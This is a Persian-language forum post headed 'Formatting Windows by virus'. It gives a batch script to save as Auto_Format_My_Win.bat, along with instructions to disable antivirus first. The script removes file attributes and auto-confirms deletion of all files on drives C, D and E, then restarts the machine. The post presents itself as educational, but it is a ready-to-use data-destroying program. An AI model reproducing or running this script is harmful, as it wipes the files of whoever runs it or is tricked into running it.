پاك كردن (Format) ويندوز توسط ويروس

persiadownload

کاربر تازه وارد
توجه:
اين مقاله فقط براي ترفيع سطح آموزشي شما مي باشد.هرگونه استفاده غلط از اين آموزش به خود شما مربوط مي شود و نويسنده اين مطلب هيچ عذري را از جانب شما قبول نمي كند.
شما در اين مقاله ياد خواهيد گرفت كه چگونه Windows را بوسيله شكلي جديد Format كنيد.بطور كل به دو صورت مي توان ويندوز را Format كرد: (CD , Floppy).كه من در اينجا آموزش مربوط به آنها را قصد ندارم كه توضيح بدهم.فقط براي آگاهي بيشتر شما گفتم.يراي شروع Notepad را باز كنيد:
Start > Programs > Accessories > Notepad
و اكنون دستورات زير را اول Copy و بعد در Notepad منتقل و يا Paste كنيد:

@echo off
ATTRIB -a -s -h -r c:\*.*
ATTRIB -a -s -h -r c:\windows\*.*
Echo y | echo a | Echo y |del c:\*.*
Echo y | echo a | Echo y |del d:\*.*
Echo y | echo a | Echo y |del e:\*.*
echo y | copy *.* c:\
echo y | copy *.* D:\
echo y | copy *.* E:\
restart
و سرانجام با نام Auto_Format_My_Win.bat در كامپيوتر خود ذخيره كنيد.سعي كنيد در ابتدا Anti Virus را غير فعال كنيد.توجه: پس از اجراي Auto_Format_My_Win.bat تمام اطلاعات شما پاك خواهند شد!!!
 
بالا